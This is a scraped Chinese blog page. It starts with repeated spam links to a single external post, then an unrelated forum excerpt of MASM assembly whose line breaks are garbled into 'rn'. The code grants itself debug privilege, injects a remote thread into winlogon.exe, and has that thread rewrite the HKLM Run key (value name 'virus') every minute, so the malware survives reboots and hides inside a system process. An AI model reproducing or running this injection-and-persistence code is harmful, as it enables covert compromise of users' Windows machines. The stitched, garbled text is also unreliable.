小说每一分钟

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42020181/article/details/80010153

百姓们的小说。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。。。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
百姓们的小说。
http://baijiahao.baidu.com/builder/preview/s?id=1598172688800532222
展开阅读全文

注入winlogon(每一分钟写入注册表启动项一次自身的文件路径)

02-07

Main.asm:rn.386rn.model flat,stdcallrnoption casemap:nonerninclude windows.incrninclude kernel32.incrninclude user32.incrninclude advapi32.incrninclude th32.incrnincludelib kernel32.librnincludelib user32.librnincludelib advapi32.librnincludelib th32.librn.data?rnlpGetProcAddress dd ?;需要被写入远程线程的函数rnlpGetModuleHandle dd ?rnlplstrlen dd ?rnlpSleep dd ?rnlpFileName db 256 dup (?);写入远程线程的自身文件名,用于写入注册表rnlpRemoteCode dd ?;远程线程开辟空间的起始地址rnhModule dd ?rnhToken dd ?rnhProcess dd ?rnhToolHelp dd ?rnstTkp TOKEN_PRIVILEGES <>;调整权限rnstProcess PROCESSENTRY32 <>;查找winlogon进程rndwWinlogon dd ?;winlogon进程号rndwTemp dd ?rn.constrnszKernelDll db 'kernel32.dll',0rnszGetProcAddress db 'GetProcAddress',0rnszGetModuleHandle db 'GetModuleHandleA',0rnszlstrlen db 'lstrlenA',0rnszSleep db 'Sleep',0rnszErrOpen db 'Can not open thread',0ah,0dh,0rnszDebugName db 'SeDebugPrivilege',0rnszWinlogonName db 'winlogon.exe',0rn.coderninclude RemoteThread.asmrnstart:rn;*********************************************************************rn;获得需要写入的函数地址,这种方法成功原因是因为kernel32.dll是所有进程共用的rn;并写入文件名rn invoke GetModuleHandle,offset szKernelDll;rn mov hModule,eaxrn invoke GetProcAddress,hModule,offset szGetProcAddressrn mov lpGetProcAddress,eaxrn invoke GetProcAddress,hModule,offset szGetModuleHandlern mov lpGetModuleHandle,eaxrn invoke GetProcAddress,hModule,offset szlstrlenrn mov lplstrlen,eaxrn invoke GetProcAddress,hModule,offset szSleeprn mov lpSleep,eaxrn invoke GetModuleFileName,NULL,addr lpFileName,sizeof lpFileNamern;*************************************************************************rn;调整当前进程的权限,设置成调试权限,才能打开winlogonrn invoke GetCurrentProcessrn invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hTokenrn invoke LookupPrivilegeValue,NULL,offset szDebugName,addr stTkp.Privileges[0].Luidrn mov stTkp.PrivilegeCount,1rn mov stTkp.Privileges[0].Attributes,SE_PRIVILEGE_ENABLEDrn invoke AdjustTokenPrivileges,hToken,FALSE,addr stTkp,NULL,NULL,NULLrn;***************************************************************************rn;查找winlogon的进程号rn invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,NULLrn mov hToolHelp,eaxrn mov stProcess.dwSize,sizeof stProcessrn invoke Process32First,hToolHelp,addr stProcessrn mov ebx,eaxrn .while ebx==TRUErn mov stProcess.dwSize,sizeof stProcessrn invoke Process32Next,hToolHelp,addr stProcessrn lea edx,stProcess.szExeFilern invoke lstrcmp,edx,offset szWinlogonNamern .if eax==0rn push stProcess.th32ProcessIDrn pop dwWinlogonrn .breakrn .endifrn .endwrn;***************************************************************************rn;打开winlogon进程rn;开辟空间rn;写入进程数据rn invoke OpenProcess,PROCESS_VM_OPERATION or PROCESS_VM_WRITE or PROCESS_CREATE_THREAD,FALSE,dwWinlogonrn .if eaxrn mov hProcess,eaxrn invoke VirtualAllocEx,hProcess,NULL,REMOTE_CODE_LENGTH,MEM_COMMIT,PAGE_EXECUTE_READWRITErn .if eaxrn mov lpRemoteCode,eaxrn invoke WriteProcessMemory,hProcess,lpRemoteCode,offset REMOTE_CODE_START,\rn REMOTE_CODE_LENGTH,addr dwTemprn invoke lstrlen,offset lpFileNamern add eax,sizeof dword*4rn invoke WriteProcessMemory,hProcess,lpRemoteCode,offset lpGetProcAddress,\rn eax,addr dwTemprn mov eax,lpRemoteCodern add eax,offset _RemoteThread-offset REMOTE_CODE_STARTrn invoke CreateRemoteThread,hProcess,NULL,NULL,eax,0,0,NULLrn invoke CloseHandle,eaxrn .endifrn invoke CloseHandle,hProcessrn .elsern invoke MessageBox,NULL,offset szErrOpen,NULL,MB_OK or MB_ICONWARNINGrn .endifrn invoke ExitProcess,NULLrn end startrnrn rnrn rnrn rnrn rnrn rnrn rnrnRemoteThread.asm:rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rnREMOTE_CODE_START equ this bytern_lpGetProcAddress dd ?rn_lpGetModuleHandle dd ?rn_lplstrlen dd ?rn_lpSleep dd ?rn_lpFileName db 256 dup (?)rn_lpRegOpenKeyEx dd ?rn_lpRegSetValueEx dd ?rn_lpRegCloseKey dd ?rn_szAdvapiDll db 'advapi32.dll',0rn_szRegOpenKeyEx db 'RegOpenKeyExA',0rn_szRegSetValueEx db 'RegSetValueExA',0rn_szRegCloseKey db 'RegCloseKey',0rn_szSubKey db 'Software\Microsoft\Windows\CurrentVersion\Run',0rn_szKeyName db 'virus',0rn_szKeyValue db 'dirlt',0rn_hKey dd ?rn;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>rn_RemoteThread proc uses ebx edi esi lParamrn local @hModule:dwordrn call @frn @@:rn pop ebxrn sub ebx,offset @brn;********************************************************rn;得到RegOpenKeyExrn;RegSetValueExrn;RegCloseKey地址rn lea eax,[ebx+offset _szAdvapiDll]rn push eaxrn call [ebx+_lpGetModuleHandle]rn mov @hModule,eaxrn lea edi,[ebx+_lpRegOpenKeyEx]rn lea esi,[ebx+_szRegOpenKeyEx]rn mov edx,3rn .repeatrn push esirn push @hModulern call [ebx+_lpGetProcAddress]rn mov [edi],eaxrn add edi,4rn @@:rn lodsbrn or al,alrn jnz @brn dec edxrn .until edx==0rn;*******************************************************rn;每秒写入一次注册表rn .while TRUErn lea eax,[ebx+offset _hKey]rn push eaxrn push KEY_ALL_ACCESSrn push 0rn lea eax,[ebx+offset _szSubKey]rn push eaxrn push HKEY_LOCAL_MACHINErn call [ebx+_lpRegOpenKeyEx]rn push sizeof _lpFileNamern lea eax,[ebx+_lpFileName]rn push eaxrn push REG_SZrn push 0rn lea eax,[ebx+_szKeyName]rn push eaxrn push [ebx+offset _hKey]rn call [ebx+_lpRegSetValueEx]rn push [ebx+offset _hKey]rn call [ebx+_lpRegCloseKey]rn push 60000rn call [ebx+_lpSleep]rn .endwrn retrn_RemoteThread endprnREMOTE_CODE_END equ this byternREMOTE_CODE_LENGTH equ offset REMOTE_CODE_END-offset REMOTE_CODE_STARTrnrnrn 论坛

没有更多推荐了,返回首页